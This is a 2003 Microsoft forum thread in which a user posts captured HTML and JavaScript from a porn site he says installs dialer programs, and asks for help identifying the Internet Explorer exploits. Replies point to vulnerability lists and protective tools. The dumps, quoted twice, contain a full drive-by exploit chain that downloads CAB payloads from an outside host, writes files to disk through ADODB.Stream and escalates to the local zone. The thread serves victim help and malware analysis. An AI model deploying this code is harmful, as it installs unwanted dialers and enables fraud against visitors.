Identify these IE exploits?

TheMSsForum.com: The Microsoft Software Forum

Hi everyone,

I'm trying to help some people who have been the victims of a pretty suspicious
porn website that installs dialler programs and stuff on their visitors' computers.
The problem is, I know zero about javascript, and am fairly clueless when it comes
to IE exploits too, which they seem to use pretty heavily in this case. I think I
have the general idea about what happens when people open these webpages (CAB-files
get downloaded and executed/installed) but it would be really great if anyone could
help me identify in more detail what the javascript code does and what exploits are
being used.

I'll include three files below. Thanks in advance for any help I can get.

Regards,

/Ragnar (you can mail user "ragnar" at the domain gatorhole dot se)


*** Dump of the HTL file that gets loaded first ***

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 12 Dec 2003 22:10:06 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 29 Oct 2003 13:15:26 GMT
ETag: "bc1ea0b71e9ec31:a64"
Content-Length: 1130

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<script>
function SetCookie (name,value,expires,path,domain) {
document.cookie = name + "=" + escape (value) +
((expires) ? "; expires=" + expires.toGMTString() : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") ;
}


var expdate = new Date ();
expdate.setTime (expdate.getTime() + 60 * 60 * 1000);
SetCookie("infoexec1.0_filename", "^smsdial752.exe^dating762.exe^connecting19.exe^", expdate,
"/");


</script>
<head>
<title>Connecting</title>
</head>

<body bgcolor="#FFFF00" text="#000000">
<table width="300" border="0" align="center" bordercolor="#000000">
<tr>
<td>
<div align="center"><font size="4"><b>Ansluter till H&Aring;RDPORR......</b></font></div>
</td>
</tr>
</table>
<div align="center"><br>

<br>
<a href="connecting19.htm"><font face="Arial, Helvetica, sans-serif" size="4"><b>SL&Auml;PP
IN MIG</b></font></a><br>
<br>

<br>
<br>
<br>
<br>
<br>
<bR>
<script src=i.js></script>
</div>
</body>
</html>




*** Dump of the javascript i.js ***

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 12 Dec 2003 22:13:51 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 08 Dec 2003 17:23:47 GMT
ETag: "6e6b1bab0bdc31:a64"
Content-Length: 2828

cabfile="http://www.sexfiles.nu/newdial/info_sex2.cab";
document.write('<div style="position: absolute; visibility: hidden;"><iframe id=if1></iframe></div>')
;

isopen=false;
openinsearch=false;
usecache=false;
function generic() {
document.write("<OBJECT CLASSID=clsid:bd11a280-2e73-11cf-b6cf-00aa00a74dae "+
"CODEBASE=http://www.sexfiles.nu/newdial/Info_sex.cab ID=i></OBJECT>");
}

function dl_o_inca(){
try{
var f2=new ActiveXObject("Microsoft.XMLHTTP");f2.Open("GET","/scripts/o_inca.htm", false); f2
.Send();
} catch(ex) {}
}

function s1(){
try{
x=GetObject("C:/WINDOWS/Tempor~1/Content.IE5/INDEX.DAT","htmlfile");
dl_o_inca();
var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile, false); f0.Send();
setTimeout("s2();",200);
} catch(ex){
openinsearch=true;
}
try{
var s=new ActiveXObject("ADODB.Stream");
} catch(ex){
usecache=true;
}

if (openinsearch){
__bb=open("http:///","_search");
isopen=true;

if (usecache){
setTimeout("__so3()", 500);
} else {
setTimeout("__so2()", 500);
}
onunload=closes;
setTimeout("closes()", 5000);
}

}
function __so2() {
try{
open('file:javascript:eval(\'s=new ActiveXObject(\"ADODB.Stream\");s.Mode=3;s.Type=1;try{s.Open()
;x=new ActiveXObject(\"Microsoft.XMLHTTP\");x.Open(\"GET\",\"'+cabfile.replace(/[/]/g,"%2f")+'\",0);x
.Send();s.Write(x.responseBody);s.SaveToFile(\"C:%2fInfo_sex2.cab\",2);s.close();}catch(ex){};try{s.o
pen();x.Open(\"GET\",\"http:%2f%2fwww.sexfiles.nu%2fnewdial%2fI-iframe.HTM\",0);x.Send();s.Write(x.re
sponseBody);s.SaveToFile(\"C:%2fI.HTM\",2);s.close();}catch(ex){};;document.location=\"C:%2fI.HTM\"\'
)',"_search");
} catch(ex) {
closes();
generic();
}
}

function __so3() {
try{
dl_o_inca();
var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile, false); f0.Send();
open('file:javascript:var z_;var a="";var ab="%2fo_inca[1].htm%3f";var xxy=GetObject("C:%2fWINDOW
S%2fTempor~1%2fContent.IE5%2fINDEX.DAT","htmlfile");var x=setTimeout("var aa=xxy.body.innerText.subst
r(30,80).match(%2f[A-Z0-9]{8}%2fg);for(i=0;i<4;i++){ab+=\\"~\\"+aa[i]};for(i=0;i<4;i++){a+=\\"<iframe
src=C:%2fWINDOWS%2fTempor~1%2fContent.IE5%2f\\"+aa[i]+ab+\\"><%2fiframe>\\"};document.write(a)",1000
);var z__;',"_search");
} catch(ex) {
closes();
generic();
}
}

function closes(){
if (isopen==true) {
isopen=false;
try{__bb.close()}catch(ex){}
}
}

function s2(){
try{
aa=x.body.innerText.substr(30,80).match(/[A-Z0-9]{8}/g);
a="";for (i=0;i<4;i++)
a+="<iframe src=C:/WINDOWS/Tempor~1/Content.IE5/"+aa[i]+"/o_inca[1].htm?"+aa[0]+"~"+aa[1]+"~"+a
a[2]+"~"+aa[3]+"></iframe>";
if1.document.write(a);
} catch(ex) {
setTimeout("s2();",200);
}
}
onload=s1;
onerror=generic;




*** Dump of the o_inca.htm file ***

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 12 Dec 2003 22:20:42 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 03 Dec 2003 16:08:56 GMT
ETag: "fa63e1c0b7b9c31:a64"
Content-Length: 252

<script>
a=document.location.href.substring(document.location.href.length-35).split('~');
for (i in a)
document.write('<OBJECT CLASSID=clsid:11111111-1111-1111-1111-11111111111'+i+' CODEBASE="../'+a[i]+
'/info_sex2[1].cab"></OBJECT>');
</script>
Top

Re: Identify these IE exploits? by Kent

Kent
Tue Dec 16 22:36:06 CST 2003

Most of the IE exploits revolve around getting scripting to run in the
My Computer security zone. See
http://www.safecenter.net/umbrellawebv4/DirSvc/security/originality/microsoft_ie/index.html
for a list of 35 vulnerabilities in IE. Post back any decoding you can
make of the descriptions. :-)

Thor Larholm used to publish a list of outstanding IE vulnerabilities,
most of which are Lui Die Yu's, but he signed up with Pivx to sell
software to plug the holes and withdrew his web page to protect his
intellectual property. But you can go to www.pivx.com and download
Quik-Fix to plug a number of these holes. I think it may be the best you
can do at the moment.

I also recommend SpywareGuard as active background anti-spyware
protection.

XP SP2 will greatly reduce the attack surface of RPC/DCOM and scripting
vulnerabilities.

--
Kent W. England, Microsoft MVP for Windows Security



"Ragnar Lonn / Telenordia Internet AB" <prl@aristotle.algonet.se> wrote
in
message news:bro9mv$24b$1@green.tninet.se...
> Hi everyone,
>
> I'm trying to help some people who have been the victims of a pretty
suspicious
> porn website that installs dialler programs and stuff on their
visitors' computers.
> The problem is, I know zero about javascript, and am fairly clueless
when it comes
> to IE exploits too, which they seem to use pretty heavily in this
case. I think I
> have the general idea about what happens when people open these
webpages (CAB-files
> get downloaded and executed/installed) but it would be really great if
anyone could
> help me identify in more detail what the javascript code does and what
exploits are
> being used.

Top

Re: Identify these IE exploits? by Mike

Mike
Wed Dec 17 09:40:39 CST 2003

Ragnar,
Some interesting reading ....... on that dialer.
http://www.kephyr.com/spywarescanner/library/dateregon/index.phtml
http://www.pestpatrol.com/PestInfo/s/sms_dialer.asp
____________________________________________________________
Mike Burgess [MVP Windows Shell\User] http://www.mvps.org/winhelp2002/
Blocking Spyware, Adware, Parasites, Hijackers, Trojans, with a HOSTS file
http://www.mvps.org/winhelp2002/hosts.htm [updated 12-15-03]
Please post replies to this Newsgroup, email address is invalid
--

"Ragnar Lonn / Telenordia Internet AB" <prl@aristotle.algonet.se> wrote in
message news:bro9mv$24b$1@green.tninet.se...
> Hi everyone,
>
> I'm trying to help some people who have been the victims of a pretty
suspicious
> porn website that installs dialler programs and stuff on their visitors'
computers.
> The problem is, I know zero about javascript, and am fairly clueless when
it comes
> to IE exploits too, which they seem to use pretty heavily in this case. I
think I
> have the general idea about what happens when people open these webpages
(CAB-files
> get downloaded and executed/installed) but it would be really great if
anyone could
> help me identify in more detail what the javascript code does and what
exploits are
> being used.
>
> I'll include three files below. Thanks in advance for any help I can get.
>
> Regards,
>
> /Ragnar (you can mail user "ragnar" at the domain gatorhole dot se)
>
>
> *** Dump of the HTL file that gets loaded first ***
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> X-Powered-By: ASP.NET
> Connection: close
> Date: Fri, 12 Dec 2003 22:10:06 GMT
> Content-Type: text/html
> Accept-Ranges: bytes
> Last-Modified: Wed, 29 Oct 2003 13:15:26 GMT
> ETag: "bc1ea0b71e9ec31:a64"
> Content-Length: 1130
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
>
> <html>
> <script>
> function SetCookie (name,value,expires,path,domain) {
> document.cookie = name + "=" + escape (value) +
> ((expires) ? "; expires=" + expires.toGMTString() : "") +
> ((path) ? "; path=" + path : "") +
> ((domain) ? "; domain=" + domain : "") ;
> }
>
>
> var expdate = new Date ();
> expdate.setTime (expdate.getTime() + 60 * 60 * 1000);
> SetCookie("infoexec1.0_filename",
"^smsdial752.exe^dating762.exe^connecting19.exe^", expdate,
> "/");
>
>
> </script>
> <head>
> <title>Connecting</title>
> </head>
>
> <body bgcolor="#FFFF00" text="#000000">
> <table width="300" border="0" align="center" bordercolor="#000000">
> <tr>
> <td>
> <div align="center"><font size="4"><b>Ansluter till
H&Aring;RDPORR......</b></font></div>
> </td>
> </tr>
> </table>
> <div align="center"><br>
>
> <br>
> <a href="connecting19.htm"><font face="Arial, Helvetica, sans-serif"
size="4"><b>SL&Auml;PP
> IN MIG</b></font></a><br>
> <br>
>
> <br>
> <br>
> <br>
> <br>
> <br>
> <bR>
> <script src=i.js></script>
> </div>
> </body>
> </html>
>
>
>
>
> *** Dump of the javascript i.js ***
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> X-Powered-By: ASP.NET
> Connection: close
> Date: Fri, 12 Dec 2003 22:13:51 GMT
> Content-Type: application/x-javascript
> Accept-Ranges: bytes
> Last-Modified: Mon, 08 Dec 2003 17:23:47 GMT
> ETag: "6e6b1bab0bdc31:a64"
> Content-Length: 2828
>
> cabfile="http://www.sexfiles.nu/newdial/info_sex2.cab";
> document.write('<div style="position: absolute; visibility:
hidden;"><iframe id=if1></iframe></div>')
> ;
>
> isopen=false;
> openinsearch=false;
> usecache=false;
> function generic() {
> document.write("<OBJECT
CLASSID=clsid:bd11a280-2e73-11cf-b6cf-00aa00a74dae "+
> "CODEBASE=http://www.sexfiles.nu/newdial/Info_sex.cab
ID=i></OBJECT>");
> }
>
> function dl_o_inca(){
> try{
> var f2=new
ActiveXObject("Microsoft.XMLHTTP");f2.Open("GET","/scripts/o_inca.htm",
false); f2
> .Send();
> } catch(ex) {}
> }
>
> function s1(){
> try{
> x=GetObject("C:/WINDOWS/Tempor~1/Content.IE5/INDEX.DAT","htmlfile");
> dl_o_inca();
> var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile,
false); f0.Send();
> setTimeout("s2();",200);
> } catch(ex){
> openinsearch=true;
> }
> try{
> var s=new ActiveXObject("ADODB.Stream");
> } catch(ex){
> usecache=true;
> }
>
> if (openinsearch){
> __bb=open("http:///","_search");
> isopen=true;
>
> if (usecache){
> setTimeout("__so3()", 500);
> } else {
> setTimeout("__so2()", 500);
> }
> onunload=closes;
> setTimeout("closes()", 5000);
> }
>
> }
> function __so2() {
> try{
> open('file:javascript:eval(\'s=new
ActiveXObject(\"ADODB.Stream\");s.Mode=3;s.Type=1;try{s.Open()
> ;x=new
ActiveXObject(\"Microsoft.XMLHTTP\");x.Open(\"GET\",\"'+cabfile.replace(/[/]
/g,"%2f")+'\",0);x
>
.Send();s.Write(x.responseBody);s.SaveToFile(\"C:%2fInfo_sex2.cab\",2);s.clo
se();}catch(ex){};try{s.o
>
pen();x.Open(\"GET\",\"http:%2f%2fwww.sexfiles.nu%2fnewdial%2fI-iframe.HTM\"
,0);x.Send();s.Write(x.re
>
sponseBody);s.SaveToFile(\"C:%2fI.HTM\",2);s.close();}catch(ex){};;document.
location=\"C:%2fI.HTM\"\'
> )',"_search");
> } catch(ex) {
> closes();
> generic();
> }
> }
>
> function __so3() {
> try{
> dl_o_inca();
> var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile,
false); f0.Send();
> open('file:javascript:var z_;var a="";var ab="%2fo_inca[1].htm%3f";var
xxy=GetObject("C:%2fWINDOW
> S%2fTempor~1%2fContent.IE5%2fINDEX.DAT","htmlfile");var x=setTimeout("var
aa=xxy.body.innerText.subst
>
r(30,80).match(%2f[A-Z0-9]{8}%2fg);for(i=0;i<4;i++){ab+=\\"~\\"+aa[i]};for(i
=0;i<4;i++){a+=\\"<iframe
>
src=C:%2fWINDOWS%2fTempor~1%2fContent.IE5%2f\\"+aa[i]+ab+\\"><%2fiframe>\\"}
;document.write(a)",1000
> );var z__;',"_search");
> } catch(ex) {
> closes();
> generic();
> }
> }
>
> function closes(){
> if (isopen==true) {
> isopen=false;
> try{__bb.close()}catch(ex){}
> }
> }
>
> function s2(){
> try{
> aa=x.body.innerText.substr(30,80).match(/[A-Z0-9]{8}/g);
> a="";for (i=0;i<4;i++)
> a+="<iframe
src=C:/WINDOWS/Tempor~1/Content.IE5/"+aa[i]+"/o_inca[1].htm?"+aa[0]+"~"+aa[1
]+"~"+a
> a[2]+"~"+aa[3]+"></iframe>";
> if1.document.write(a);
> } catch(ex) {
> setTimeout("s2();",200);
> }
> }
> onload=s1;
> onerror=generic;
>
>
>
>
> *** Dump of the o_inca.htm file ***
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> X-Powered-By: ASP.NET
> Connection: close
> Date: Fri, 12 Dec 2003 22:20:42 GMT
> Content-Type: text/html
> Accept-Ranges: bytes
> Last-Modified: Wed, 03 Dec 2003 16:08:56 GMT
> ETag: "fa63e1c0b7b9c31:a64"
> Content-Length: 252
>
> <script>
>
a=document.location.href.substring(document.location.href.length-35).split('
~');
> for (i in a)
> document.write('<OBJECT
CLASSID=clsid:11111111-1111-1111-1111-11111111111'+i+' CODEBASE="../'+a[i]+
> '/info_sex2[1].cab"></OBJECT>');
> </script>


Top